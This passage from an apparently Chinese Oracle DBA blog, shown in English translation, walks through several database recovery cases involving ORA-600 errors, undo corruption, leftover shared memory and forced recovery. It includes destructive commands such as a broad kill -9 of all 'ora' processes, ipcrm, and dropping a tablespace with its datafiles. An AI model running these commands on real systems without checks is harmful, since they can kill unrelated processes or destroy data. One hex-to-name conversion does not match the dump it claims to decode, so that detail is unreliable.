Total Pages Failing   (Seg)  : 0
Total Pages Empty            : 1
Total Pages Marked Corrupt   : 0
Total Pages Influx           : 0
Total Pages Encrypted        : 0
Highest block SCN            : 0 (0.0)

Surprisingly, the undo datafile checks out fine. So where is the problem? Since the block in question is an undo segment header block, let's dump it and take a look.

  Extent Control Header
  -----------------------------------------------------------------
  Extent Header:: spare1: 0      spare2: 0      #extents: 88     #blocks: 569743
                  last map  0x00000000  #maps: 0      offset: 4080
      Highwater::  0x01076920  ext#: 52     blk#: 2208   ext size: 8192
  #blocks in seg. hdr's freelists: 0
  #blocks below: 0
  mapblk  0x00000000  offset: 52
                   Unlocked
     Map Header:: next  0x00000000  #extents: 88   obj#: 0      flag: 0x40000000
  Extent Map
  -----------------------------------------------------------------
   0x01000111  length: 7
   0x1844b980  length: 8
   0x010ced80  length: 8192
   ......
  TRN CTL:: seq: 0x9399 chd: 0x0021 ctl: 0x0010 inc: 0x00000000 nfb: 0x0003
            mgc: 0xb000 xts: 0x0068 flg: 0x0001 opt: 2147483646 (0x7ffffffe)
            uba: 0x0107691f.9399.15 scn: 0x0dea.957d64f7
Version: 0x01
  FREE BLOCK POOL::
    uba: 0x0107691f.9399.16 ext: 0x34 spc: 0x1486
    uba: 0x01076920.9399.03 ext: 0x34 spc: 0x11a4
    uba: 0x0107691c.9399.14 ext: 0x34 spc: 0x1656
    uba: 0x00000000.9344.19 ext: 0x37 spc: 0x1688
    uba: 0x00000000.bd47.04 ext: 0x5  spc: 0x1d3a
  TRN TBL::

  index  state cflags  wrap#    uel         scn            dba            parent-xid    nub     stmt_num    cmt
  ------------------------------------------------------------------------------------------------
   0x00    9    0x00  0xffffdd12  0x0003  0x0dea.957d661f  0x0107691c  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x01    9    0x00  0xffffea71  0x001e  0x0dea.957d65ac  0x0107691b  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x02    9    0x00  0xffffecf0  0x0010  0x0dea.957d671d  0x0107691f  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   ......
   0x14    9    0x00  0xffffd6de  0x0015  0x0dea.957d65c4  0x0107691c  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x15    9    0x00  0xfffff0dd  0x0013  0x0dea.957d65d8  0x0107691c  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x16    9    0x00  0xffffd57c  0x0014  0x0dea.957d65c2  0x0107691c  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x17    9    0x00  0xffffe5db  0x0002  0x0dea.957d6716  0x0107691f  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x18    9    0x00  0xffffee0a  0x0017  0x0dea.957d6710  0x0107691f  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x19    9    0x00  0xffffe239  0x0009  0x0dea.957d658d  0x0107691b  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x1a    9    0x00  0xffffe4d8  0x000a  0x0dea.957d6709  0x0107691f  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x1b    9    0x00  0xffff5827  0x001a  0x0dea.957d6705  0x0107691f  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x1c    9    0x00  0xfffff836  0x000e  0x0dea.957d66fb  0x0107691f  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x1d    9    0x00  0xffffc955  0x000b  0x0dea.957d65b7  0x0107691b  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x1e    9    0x00  0xffffec64  0x000d  0x0dea.957d65b0  0x0107691b  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x1f    9    0x00  0xffffdcd3  0x000f  0x0dea.957d66dc  0x0107691f  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x20    9    0x00  0xffffe4e2  0x001c  0x0dea.957d66e8  0x0107691c  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x21    9    0x00  0xfffffff1  0x000c  0x0dea.957d6513  0x0107691b  0x0000.000.00000000  0x00000001   0x00000000  1489714986
  EXT TRN CTL::
  usn: 20
  sp1:0x00000000 sp2:0x00000000 sp3:0x00000000 sp4:0x00000000
  sp5:0x00000000 sp6:0x00000000 sp7:0x00000000 sp8:0x00000000
  EXT TRN TBL::
  index  extflag    extHash    extSpare1   extSpare2
  ---------------------------------------------------
   0x00  0x00000000 0x00000000 0x00000000  0x00000000
   0x01  0x00000000 0x00000000 0x00000000  0x00000000
   ......
   0x1f  0x00000000 0x00000000 0x00000000  0x00000000
   0x20  0x00000000 0x00000000 0x00000000  0x00000000
   0x21  0x00000000 0x00000000 0x00000000  0x00000000
GLOBAL CACHE ELEMENT DUMP (address: 0x700010001ed9618):
  id1: 0x110 id2: 0x4 pkey: INVALID block: (4/272)
  lock: X rls: 0x0 acq: 0x0 latch: 16
  flags: 0x20 fair: 0 recovery: 0 fpin: 'ktuwh72: ktugus:ktuswr1'
  bscn: 0xdea.957d672f bctx: 0x0 write: 0 scan: 0x0
  lcp: 0x0 lnk: [NULL] lch: [0x700010267e80150,0x700010267e80150]
  seq: 686 hist: 145:0 28 340 225 212 72 257 59 334 43 158:0 38
  LIST OF BUFFERS LINKED TO THIS GLOBAL CACHE ELEMENT:
    flg: 0x08200001 state: XCURRENT tsn: 4 tsh: 3
      addr: 0x700010267e80018 obj: INVALID cls: UNDO HEAD bscn: 0xdea.957d672f

From the full dump of the rollback segment header, the information really does not match what is in the redo, so it is no surprise that an INVALID block is reported in the end.
A colleague suggested this might be Bug 19700135: ORA-600 [4187] WHEN WRAP# IS CLOSE TO KSQNMAXVAL.
After some analysis, however, the symptoms do not entirely match that bug.
In any case, the dump shows no active transactions in this rollback segment, so the problem can be handled by rebuilding the undo tablespace or dropping the rollback segment.
In the end I rebuilt the undo tablespace, watched for 10 minutes, and the alert log stopped reporting any ORA-00600 errors. That closed out this small issue. (A sketch of the rebuild steps follows.)
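For reference, a minimal sketch of swapping in a new undo tablespace (the new tablespace name and size are illustrative; UNDOTBS2 and instance abm2 are the ones from this case):

SQL> create undo tablespace UNDOTBS3 datafile '+DG_DATA' size 4g;
SQL> alter system set undo_tablespace='UNDOTBS3' sid='abm2';
SQL> -- once no active transactions still reference the old undo segments:
SQL> drop tablespace UNDOTBS2 including contents and datafiles;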

Related posts:

  1. ORA-01561 & ora-00600 [ktadrprc-1]
  2. win 环境 O/S-Error: (OS 23) 数据错误(循环冗余检查) —恢复
  3. “IPC send timeout error” 导致RAC的节点挂起
  4. ora-00600 [kddummy_blkchk] solution
  5. 15 TB 3节点RAC 的恢复记录

Oracle 9i Hits ORA-00600 [OSDEP_INTERNAL]


本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: Oracle 9i遭遇ORA-00600 OSDEP_INTERNAL

A few days ago a colleague reported that a customer database was behaving abnormally: the load was extremely high and the server was almost unresponsive, so the only option was to power-cycle the server to restart the database. Tragically, after the server came back up, the database would no longer start.

First, let's see what error the database throws on startup:

Mon Apr 24 16:28:11 2017
This instance was first to mount
LCK0 started with pid=18, OS id=667902
Mon Apr 24 16:28:15 2017
Successful mount of redo thread 1, with mount id 2877742299
Mon Apr 24 16:28:15 2017
Database mounted in Shared Mode (CLUSTER_DATABASE=TRUE).
Completed: ALTER DATABASE   MOUNT
Mon Apr 24 16:31:14 2017
Errors in file /oracle/app/oracle/admin/jchs07/bdump/jchs07a_smon_516226.trc:
ORA-00601: cleanup lock conflict
Mon Apr 24 16:31:19 2017
SMON: terminating instance due to error 601
Instance terminated by SMON, pid = 516226
Mon Apr 24 16:31:19 2017
Errors in file /oracle/app/oracle/admin/jchs07/bdump/jchs07a_smon_516226.trc:
ORA-00600: internal error code, arguments: [OSDEP_INTERNAL], [], [], [], [], [], [], []
ORA-27302: failure occurred at: skgpwreset1
ORA-27303: additional information: invalid shared ctx
ORA-00601: cleanup lock conflict
Mon Apr 24 16:31:19 2017
Errors in file /oracle/app/oracle/admin/jchs07/bdump/jchs07a_smon_516226.trc:
ORA-07445: exception encountered: core dump [] [] [] [] [] []
ORA-00600: internal error code, arguments: [OSDEP_INTERNAL], [], [], [], [], [], [], []
ORA-27302: failure occurred at: skgpwreset1
ORA-27303: additional information: invalid shared ctx
ORA-00601: cleanup lock conflict

From these errors, ORA-00601 is raised while opening the database after the mount, and it is thrown by the SMON process; in other words SMON hit it during its recovery work and ended up forcibly terminating the instance. That is why, as my colleague reported, the sqlplus session got ORA-03113 as soon as alter database open was issued. Here is the call stack from the trace file:

ORA-00600: internal error code, arguments: [OSDEP_INTERNAL], [], [], [], [], [], [], []
ORA-27302: failure occurred at: skgpwreset1
ORA-27303: additional information: invalid shared ctx
ORA-00601: cleanup lock conflict
----- Call Stack Trace -----
calling              call     entry                argument values in hex
location             type     point                (? means dubious value)
-------------------- -------- -------------------- ----------------------------
ksedmp+0148          bl       ksedst               1029762F4 ?
ksfdmp+0018          bl       01FD5C3C
kgerinv+00e8         bl       _ptrgl
kgerin+003c          bl       kgerinv              BADC0FFEE0DDF00D ?
                                                   BADC0FFEE0DDF00D ?
                                                   BADC0FFEE0DDF00D ?
                                                   BADC0FFEE0DDF00D ?
                                                   FFFFFFFFFFFE830 ?
kgerecoserr+0144     bl       kgerin               110005BA8 ? 110396408 ?
                                                   1029745C4 ? 000000000 ?
                                                   102974480 ? 000000000 ?
                                                   000000000 ? 000000000 ?
ksugprst+0068        bl       kgerecoserr          000000000 ? 102978294 ?
                                                   FFFFFFFFFFFDA48 ?
ksuitm+0790          bl       ksugprst
ksbrdp+0580          bl       ksuitm               000000000 ? 25900000259 ?
opirip+02a8          bl       ksbrdp
opidrv+0300          bl       opirip               9001000A0269318 ? 0101FA7E0 ?
                                                   000000000 ?
sou2o+0028           bl       opidrv               32E0DDF00D ? 0A0059810 ?
                                                   000000000 ?
main+01a4            bl       01FD5650
__start+0090         bl       main                 000000000 ? 000000000 ?

Looking at the chain of ORA- errors, remember that such stacks are read from the bottom up: ORA-00601 is the key, the root cause, which then led to ORA-27303, ORA-27302 and so on.

Going by the error's basic description, there is a lock conflict; but the database isn't even open, so where would a lock come from? The obvious conclusion is that the previous instance's shared memory at the OS level had not been cleaned up.

Sure enough, ipcs -a showed shared memory segments still allocated by instances started earlier, and some ora_ processes were still around. After killing the processes with ps -ef|grep ora|grep -v grep|awk '{print $2}'|xargs kill -9, the segments were removed with ipcrm -m.
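A minimal sketch of that cleanup, assuming this is the only database on the host (always double-check what you are about to kill; the segment IDs are placeholders):

$ ipcs -a                                    # shared memory / semaphores still held by the dead instance
$ ps -ef | grep ora_ | grep -v grep          # leftover Oracle background processes
$ ps -ef | grep ora_ | grep -v grep | awk '{print $2}' | xargs kill -9
$ ipcrm -m <shmid>                           # repeat for every orphaned shared memory id
$ ipcrm -s <semid>                           # and for orphaned semaphore sets, if any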

Next I tried to bring the database up again; a manual recover database then hit a different set of errors:

SQL> recover database;
ORA-00283: recovery session canceled due to errors
ORA-10562: Error occurred while applying redo to data block (file# 1, block# 164301)
ORA-10564: tablespace SYSTEM
ORA-01110: data file 1: '/dev/rlv07_2g_sys'
ORA-10561: block type 'TRANSACTION MANAGED INDEX BLOCK', data object# 3
ORA-00607: Internal error occurred while making a change to a data block
ORA-00600: internal error code, arguments: [kcoapl_blkchk], [1], [164301],
[6401], [], [], [], []

This error is fairly rare; it was also the first time I had seen ORA-00600 [kcoapl_blkchk]. From the surrounding log entries, however, it is clear that the database hit an exception while applying redo to a data block, and the problematic block is file 1 block 164301, i.e. in the SYSTEM datafile.

We can also see that the block belongs to data object# 3, one of the core bootstrap objects, and that it is an index.

Looking a little closer, the problem with this block is at the transaction layer, since ORA-10561 is raised.

So let's first run dbv against the SYSTEM datafile to see whether there is any physical corruption:

jchsdb1:/oracle>dbv file=/dev/rlv07_2g_sys blocksize=8192

DBVERIFY: Release 9.2.0.8.0 - Production on Mon Apr 24 18:13:21 2017

Copyright (c) 1982, 2002, Oracle Corporation.  All rights reserved.

DBVERIFY - Verification starting : FILE = /dev/rlv07_2g_sys

DBVERIFY - Verification complete

Total Pages Examined         : 261120
Total Pages Processed (Data) : 90663
Total Pages Failing   (Data) : 0
Total Pages Processed (Index): 58458
Total Pages Failing   (Index): 0
Total Pages Processed (Other): 2011
Total Pages Processed (Seg)  : 0
Total Pages Failing   (Seg)  : 0
Total Pages Empty            : 109988
Total Pages Marked Corrupt   : 0
Total Pages Influx           : 0
Highest block SCN            : 14868719377535 (3461.3837566079)

According to dbv, the SYSTEM datafile has no physical corruption. If it is not physical, then given the earlier errors this block is most likely logically corrupt. RMAN can be used to check and confirm this further.
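For example, a minimal RMAN sketch of such a logical check; on 9i the findings end up in v$backup_corruption, while from 10g onward v$database_block_corruption is the usual view to query:

RMAN> backup validate check logical datafile 1;

SQL> select * from v$backup_corruption;            -- 9i
SQL> select * from v$database_block_corruption;    -- 10g and later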

To get the database up as quickly as possible, I first attempted recovery as follows:

jchsdb1:/oracle>sqlplus "/as sysdba"

SQL*Plus: Release 9.2.0.8.0 - Production on Mon Apr 24 19:22:19 2017

Copyright (c) 1982, 2002, Oracle Corporation.  All rights reserved.

Connected to an idle instance.

SQL> startup mount
ORACLE instance started.

Total System Global Area 2568456648 bytes
Fixed Size                   743880 bytes
Variable Size            1493172224 bytes
Database Buffers         1073741824 bytes
Redo Buffers                 798720 bytes
Database mounted.
SQL> RECOVER DATABASE ALLOW 1 CORRUPTION;
Media recovery complete.
SQL> show parameter job

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
job_queue_processes                  integer     10
SQL> alter system set job_queue_processes=0;

System altered.

SQL> alter database open;

Database altered.

The database opened without trouble, which also suggests the damage is not severe and only a few blocks are affected; otherwise the command above would not have helped much.

A quick side note: with RECOVER ... ALLOW n CORRUPTION, Oracle 9i and 10g only allow 1 corrupt block, whereas from 11gR2 onward multiple blocks are allowed, up to 10.

After opening the database I checked the alert log and found some other errors, as shown below:

ORA-00600: internal error code, arguments: [25012], [0], [852], [], [], [], [], []
Current SQL statement for this session:
INSERT INTO LOG_DB_SIZE_CHANGE SELECT SYSDATE,ROUND(SUM(BYTES)/1024/1024/1024,2) FROM DBA_SEGMENTS GROUP BY SYSDATE
----- PL/SQL Call Stack -----
  object      line  object
  handle    number  name
700000064ab51c0         3  procedure SYSTEM.LOG_TOTAL_DB_SIZE_PRO
700000064ac73a8         1  anonymous block

Seeing only this error, my first thought was that the SQL might be failing because of the ALLOW 1 CORRUPTION recovery we had just done.

I looked this error up on Oracle MetaLink; the note ORA-600 [25012] "Relative to Absolute File Number Conversion Error" (Doc ID 100073.1) says it may indicate physical corruption, where [0] is the tablespace number and [852] the relative file number.

In this case that does not seem right: the database has only a little over 200 datafiles, so a file number above 800 is unlikely, and dbv has already shown the SYSTEM file has no physical corruption.

Setting aside whether the MOS note applies, the error itself comes from a monitoring script, whose purpose is to obtain the database size by querying dba_segments.

Does the dba_segments access touch the data object# 3 we saw earlier? Opening the trace file in vi and searching for the Plan_Table keyword shows the execution plan of the failing SQL, and it does not involve data object# 3 at all.

So besides data object# 3, other objects in this database probably also have logical inconsistencies; a database-wide consistency check is therefore advisable, and if necessary the database should be rebuilt.

I kept wondering about the root cause of all this. Initially I suspected the following possibilities:

1. The forced host restart lost data in the host cache, resulting in lost writes to the Oracle redo or datafiles;

2. The SYSTEM datafile was already inconsistent beforehand;

3. An Oracle bug.

 

Since this Oracle 9.2.0.8 database sits on raw devices, Oracle's file I/O should not go through the OS cache, which rules out the first scenario. So either the database already had problems, or it hit some Oracle bug (which bug exactly was not investigated further).

A reminder: for old Oracle 9i databases, especially those running in noarchivelog mode, forced restarts are best avoided; they can lead to exactly this kind of trouble.

 

Related posts:

  1. ora-00600 [kgeade_is_0]
  2. ora-00600 [kkslgbv0]
  3. About ora-00600 [4400] [48]
  4. ora-00600 [kddummy_blkchk] solution
  5. 非归档遭遇ora-00600 [kcratr_nab_less_than_odr]的恢复

DataBase can’t be open after shutdown immediate


本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: DataBase can’t be open after shutdown immediate

Over the May Day holiday a customer's database failed. Reportedly several engineers had spent a whole day on it without being able to open the database, consulting many articles on the internet and trying a series of hidden parameters, all to no avail. Here is a brief account of the case.

Some background first: in the early hours of April 30 the customer shut the database down with shutdown immediate for maintenance; on startup it threw errors and would not open, and every recovery attempt since had failed. Let's look at the logs, starting with the shutdown:

Sun Apr 30 02:01:19 2017
Shutting down instance (immediate)
Stopping background process SMCO
Shutting down instance: further logons disabled
Sun Apr 30 02:01:20 2017
Stopping background process CJQ0
Stopping background process QMNC
Stopping background process MMNL
Stopping background process MMON
License high water mark = 262
All dispatchers and shared servers shutdown
Sun Apr 30 02:01:30 2017
ALTER DATABASE CLOSE NORMAL
Sun Apr 30 02:01:30 2017
SMON: disabling tx recovery
SMON: disabling cache recovery
Sun Apr 30 02:01:36 2017
Shutting down archive processes
Archiving is disabled
Sun Apr 30 02:01:36 2017
Sun Apr 30 02:01:36 2017
ARCH shutting downARCH shutting downSun Apr 30 02:01:36 2017

ARCH shutting down

ARC3: Archival stopped
ARC0: Archival stopped
ARC1: Archival stopped
Sun Apr 30 02:01:36 2017
ARCH shutting down
ARC2: Archival stopped
Thread 1 closed at log sequence 138760
Successful close of redo thread 1
Sun Apr 30 02:02:18 2017
Completed: ALTER DATABASE CLOSE NORMAL
ALTER DATABASE DISMOUNT
Shutting down archive processes
Archiving is disabled
Completed: ALTER DATABASE DISMOUNT
ARCH: Archival disabled due to shutdown: 1089
Shutting down archive processes
Archiving is disabled
ARCH: Archival disabled due to shutdown: 1089
Shutting down archive processes
Archiving is disabled
Sun Apr 30 02:02:20 2017
Stopping background process VKTM
Sun Apr 30 02:03:20 2017
Instance shutdown complete

 

 

You can see that the database really was stopped with shutdown immediate. On the customer's first attempt to start it, ORA-00600 [2663] was raised, as follows:

Sun Apr 30 02:56:50 2017
ARC3 started with pid=40, OS id=73358
ARC1: Archival started
ARC2: Archival started
ARC1: Becoming the 'no FAL' ARCH
ARC1: Becoming the 'no SRL' ARCH
ARC2: Becoming the heartbeat ARCH
Thread 1 opened at log sequence 138760
  Current log# 5 seq# 138760 mem# 0: /opt/oracle/oradata/jddb/redo05.log
Successful open of redo thread 1
MTTR advisory is disabled because FAST_START_MTTR_TARGET is not set
SMON: enabling cache recovery
Errors in file /opt/oracle/diag/rdbms/jddb/jddb/trace/jddb_ora_73336.trc  (incident=384297):
ORA-00600: internal error code, arguments: [2663], [0], [2081888970], [0], [2081892886], [], [], [], [], [], [], []
Incident details in: /opt/oracle/diag/rdbms/jddb/jddb/incident/incdir_384297/jddb_ora_73336_i384297.trc
ARC3: Archival started
ARC0: STARTING ARCH PROCESSES COMPLETE
Use ADRCI or Support Workbench to package the incident.
See Note 411.1 at My Oracle Support for error and packaging details.
Undo initialization errored: err:600 serial:0 start:1909462874 end:1909464654 diff:1780 (17 seconds)
Errors in file /opt/oracle/diag/rdbms/jddb/jddb/trace/jddb_ora_73336.trc:
ORA-00600: internal error code, arguments: [2663], [0], [2081888970], [0], [2081892886], [], [], [], [], [], [], []
Errors in file /opt/oracle/diag/rdbms/jddb/jddb/trace/jddb_ora_73336.trc:
ORA-00600: internal error code, arguments: [2663], [0], [2081888970], [0], [2081892886], [], [], [], [], [], [], []
Error 600 happened during db open, shutting down database
USER (ospid: 73336): terminating the instance due to error 600
Instance terminated by USER, pid = 73336
ORA-1092 signalled during: ALTER DATABASE OPEN...
opiodr aborting process unknown ospid (73336) as a result of ORA-1092

 

 

This is a very common error, usually related to data block SCNs. Experience says that when the current SCN (the SCN base here) and the dependent SCN (base) are very close (and the SCN wraps match or are 0), the gap is tiny and simply restarting the database a few times will usually get past the error. Sure enough, the customer's alert log shows that after several restarts the error changed to ORA-00600 [4194], as follows:

Recovery of Online Redo Log: Thread 1 Group 1 Seq 138761 Reading mem 0
  Mem# 0: /opt/oracle/oradata/jddb/redo01.log
Block recovery completed at rba 138761.5.16, scn 0.2081908976
Errors in file /opt/oracle/diag/rdbms/jddb/jddb/trace/jddb_ora_73923.trc:
ORA-00600: internal error code, arguments: [4194], [], [], [], [], [], [], [], [], [], [], []
Errors in file /opt/oracle/diag/rdbms/jddb/jddb/trace/jddb_ora_73923.trc:
ORA-00600: internal error code, arguments: [4194], [], [], [], [], [], [], [], [], [], [], []
Error 600 happened during db open, shutting down database
USER (ospid: 73923): terminating the instance due to error 600
Instance terminated by USER, pid = 73923
ORA-1092 signalled during: ALTER DATABASE OPEN...
opiodr aborting process unknown ospid (73923) as a result of ORA-1092

 

 

This looks like a simple error: roughly speaking, during transaction recovery Oracle finds that the redo and undo information disagree, and raises it. Here is the standard explanation from Oracle MOS for reference: Basic Steps to be Followed While Solving ORA-00600 [4194]/[4193] Errors Without Using Unsupported parameter (Doc ID 281429.1)

Format: ORA-600 [4194] [a] [b]

VERSIONS:
  versions 6.0 to 12.1 

DESCRIPTION:

  A mismatch has been detected between Redo records and rollback (Undo)
  records.

  We are validating the Undo record number relating to the change being
  applied against the maximum undo record number recorded in the undo block.

  This error is reported when the validation fails.

ARGUMENTS:
  Arg [a] Maximum Undo record number in Undo block
  Arg [b] Undo record number from Redo block

FUNCTIONALITY:
  Kernel Transaction Undo called from Cache layer

IMPACT:
  PROCESS FAILURE
  POSSIBLE ROLLBACK SEGMENT CORRUPTION

SUGGESTIONS:

  This error may indicate a rollback segment corruption.

  This may require a recovery from a database backup depending on
  the situation.

  If the Known Issues section below does not help in terms of identifying
  a solution, please submit the trace files and alert.log to Oracle
  Support Services for further analysis.

The note says the error means that, during recovery, the undo record number in the undo block does not match the undo record number referenced in the redo. It usually comes down to rollback segment corruption. Rather than dissecting the alert log line by line, I will walk through my actual recovery steps below.

First I attempted a normal recovery and open:

SQL> recover database using backup controlfile until cancel;
ORA-00279: change 2082649195 generated at 04/30/2017 12:53:07 needed for thread 1
ORA-00289: suggestion : /opt/oraarch/1_138798_924909160.dbf
ORA-00280: change 2082649195 for thread 1 is in sequence #138798

Specify log: {<RET>=suggested | filename | AUTO | CANCEL}
/opt/oracle/oradata/jddb/redo03.log
Log applied.
Media recovery complete.
SQL>
SQL> alter database open resetlogs;
alter database open resetlogs
*
ERROR at line 1:
ORA-03113: end-of-file on communication channel
Process ID: 44134
Session ID: 397 Serial number: 3

The command failed and the database did not open. The alert log at that point shows exactly the ORA-00600 [4194] error mentioned earlier:

Sun Apr 30 21:01:05 2017
SMON: enabling cache recovery
Errors in file /opt/oracle/diag/rdbms/jddb/jddb/trace/jddb_ora_44134.trc  (incident=840297):
ORA-00600: internal error code, arguments: [4194], [rch/1_138795_924909160.dbft/oraarch/1_138798_924909160.dbf
Incident details in: /opt/oracle/diag/rdbms/jddb/jddb/incident/incdir_840297/jddb_ora_44134_i840297.trc
Use ADRCI or Support Workbench to package the incident.
See Note 411.1 at My Oracle Support for error and packaging details.
ARC3: Archival started
ARC0: STARTING ARCH PROCESSES COMPLETE
Block recovery from logseq 1, block 3 to scn 2082649208
Recovery of Online Redo Log: Thread 1 Group 1 Seq 1 Reading mem 0
  Mem# 0: /opt/oracle/oradata/jddb/redo01.log
Block recovery stopped at EOT rba 1.5.16
Block recovery completed at rba 1.5.16, scn 0.2082649206
Block recovery from logseq 1, block 3 to scn 2082649205
Recovery of Online Redo Log: Thread 1 Group 1 Seq 1 Reading mem 0
  Mem# 0: /opt/oracle/oradata/jddb/redo01.log
Block recovery completed at rba 1.5.16, scn 0.2082649206
Errors in file /opt/oracle/diag/rdbms/jddb/jddb/trace/jddb_ora_44134.trc:
ORA-00600: internal error code, arguments: [4194], [rch/1_138795_924909160.dbft/oraarch/1_138798_924909160.dbf
], [], [], [], [], [], [], [], [], [], []
Errors in file /opt/oracle/diag/rdbms/jddb/jddb/trace/jddb_ora_44134.trc:
ORA-00600: internal error code, arguments: [4194], [rch/1_138795_924909160.dbft/oraarch/1_138798_924909160.dbf
], [], [], [], [], [], [], [], [], [], []
Error 600 happened during db open, shutting down database
USER (ospid: 44134): terminating the instance due to error 600
Instance terminated by USER, pid = 44134

This ORA-00600 is identical to the one seen before. The usual trick for it is to try to get past it with undo_management='manual', but that did not work here. Digging into the corresponding trace file, Oracle points at a problem block:

Error 600 in redo application callback
Dump of change vector:
TYP:0 CLS:16 AFN:1 DBA:0x00400083 OBJ:4294967295 SCN:0x0000.7c172a16 SEQ:11 OP:5.1 ENC:0 RBL:0
ktudb redo: siz: 268 spc: 7602 flg: 0x0012 seq: 0x0024 rec: 0x03
            xid:  0x0000.03f.00000023
ktubl redo: slt: 63 rci: 0 opc: 11.1 [objn: 15 objd: 15 tsn: 0]
Undo type:  Regular undo        Begin trans    Last buffer split:  No
Temp Object:  No
Tablespace Undo:  No
             0x00000000  prev ctl uba: 0x00400084.0024.20
prev ctl max cmt scn:  0x0000.70105e77  prev tx cmt scn:  0x0000.70105e79
txn start scn:  0xffff.ffffffff  logon user: 0  prev brb: 4194863  prev bcl: 0 BuExt idx: 0 flg2: 0
KDO undo record:
KTB Redo
op: 0x04  ver: 0x01
compat bit: 4 (post-11) padding: 1
op: L  itl: xid:  0x0000.03d.00000023 uba: 0x00400084.0024.1e
                      flg: C---    lkc:  0     scn: 0x0000.7c171ac6
KDO Op code: URP row dependencies Disabled
  xtype: XA flags: 0x00000000  bdba: 0x004000e1  hdba: 0x004000e0
itli: 1  ispac: 0  maxfr: 4863
tabn: 0 slot: 1(0x1) flag: 0x2c lock: 0 ckix: 0
ncol: 17 nnew: 12 size: 0
col  1: [20]  5f 53 59 53 53 4d 55 31 5f 33 37 32 34 30 30 34 36 30 36 24
col  2: [ 2]  c1 02
col  3: [ 2]  c1 04
col  4: [ 3]  c2 02 1d
col  5: [ 6]  c5 15 52 59 59 51
col  6: [ 1]  80
col  7: [ 4]  c3 11 5b 25
col  8: [ 3]  c3 03 08
col  9: [ 1]  80
col 10: [ 2]  c1 04
col 11: [ 2]  c1 03
col 16: [ 2]  c1 03
Block after image is corrupt:
buffer tsn: 0 rdba: 0x00400083 (1/131)
scn: 0x0000.7c172a16 seq: 0x0b flg: 0x04 tail: 0x2a16020b
frmt: 0x02 chkval: 0x205f type: 0x02=KTU UNDO BLOCK

This is easy to interpret: redo apply hit an exception, and Oracle explicitly flags the undo block at file 1 block 131. The listing above is the dump of the redo change; now let's see what the before-image in the corresponding undo block looks like:

*-----------------------------
* Rec #0x3  slt: 0x3f  objn: 15(0x0000000f)  objd: 15  tblspc: 0(0x00000000)
*       Layer:  11 (Row)   opc: 1   rci 0x00
Undo type:  Regular undo    Begin trans    Last buffer split:  No
Temp Object:  No
Tablespace Undo:  No
rdba: 0x00000000Ext idx: 0
flg2: 0
*-----------------------------
uba: 0x00400084.0024.20 ctl max scn: 0x0000.70105e77 prv tx scn: 0x0000.70105e79
txn start scn: scn: 0x0000.7c171acb logon user: 0
 prev brb: 4194863 prev bcl: 0
KDO undo record:
KTB Redo
op: 0x04  ver: 0x01
compat bit: 4 (post-11) padding: 1
op: L  itl: xid:  0x0000.03d.00000023 uba: 0x00400084.0024.1e
                      flg: C---    lkc:  0     scn: 0x0000.7c171ac6
KDO Op code: URP row dependencies Disabled
  xtype: XA flags: 0x00000000  bdba: 0x004000e1  hdba: 0x004000e0
itli: 1  ispac: 0  maxfr: 4863
tabn: 0 slot: 10(0xa) flag: 0x2c lock: 0 ckix: 0
ncol: 17 nnew: 12 size: 0
col  1: [21]
 5f 53 59 53 53 4d 55 31 30 5f 31 31 39 37 37 33 34 39 38 39 24
col  2: [ 2]  c1 02
col  3: [ 2]  c1 04
col  4: [ 3]  c2 03 49
col  5: [ 6]  c5 15 52 59 5a 0a
col  6: [ 1]  80
col  7: [ 4]  c3 21 40 24
col  8: [ 4]  c3 04 06 33
col  9: [ 1]  80
col 10: [ 2]  c1 03
col 11: [ 2]  c1 03
col 16: [ 2]  c1 03

They do not match at all. Converting the dumped column values with a small script shows that they are in fact rollback segment names:

www.killdb.com@ SELECT F_GET_FROM_DUMP('5f,53,59,53,53,4d,55,32,5f,32,39,39,36,33,39,31,33,33,32,24','VARCHAR2') GET_DUMP
  2  from dual;

GET_DUMP
--------------------------------------------------------------------------------------------------------------------------
_SYSSMU2_2996391332$

www.killdb.com@ SELECT F_GET_FROM_DUMP('5f,53,59,53,53,4d,55,31,30,5f,31,31,39,37,37,33,34,39,38,39,24','VARCHAR2') GET_DUMP
  2  from dual;

GET_DUMP
--------------------------------------------------------------------------------------------------------------------------
_SYSSMU10_1197734989$

Combined with the earlier explanation of ORA-00600 [4194], the record number in the undo block here is 0x20, while the record number recorded in the redo block is 0x2, which indeed do not match.

So how do we fix this? Could hiding the rollback segment do the trick? I enabled a 10046 trace before the open to see what happens, and got the following:

update /*+ rule */ undo$ set name=:2,file#=:3,block#=:4,status$=:5,user#=:6,undosqn=:7,xactsqn=:8,scnbas=:9,scnwrp=:10,inst#=:11,ts#=:12,spare1=:13 where us#=:1
END OF STMT
PARSE #140333533666600:c=4999,e=4974,p=8,cr=62,cu=0,mis=1,r=0,dep=1,og=3,plh=0,tim=1493558803488842
BINDS #140333533666600:
 Bind#0
  oacdty=01 mxl=32(20) mxlc=00 mal=00 scl=00 pre=00
  oacflg=18 fl2=0001 frm=01 csi=871 siz=32 off=0
  kxsbbbfp=281ff02342  bln=32  avl=20  flg=09
  value="_SYSSMU1_3724004606$"
 Bind#1
  oacdty=02 mxl=22(22) mxlc=00 mal=00 scl=00 pre=00
  oacflg=08 fl2=0001 frm=00 csi=00 siz=24 off=0
  kxsbbbfp=7fa1f26dc788  bln=24  avl=02  flg=05
  value=3
......
WAIT #140333533666600: nam='db file sequential read' ela= 12 file#=1 block#=131 blocks=1 obj#=0 tim=1493558803489767
......
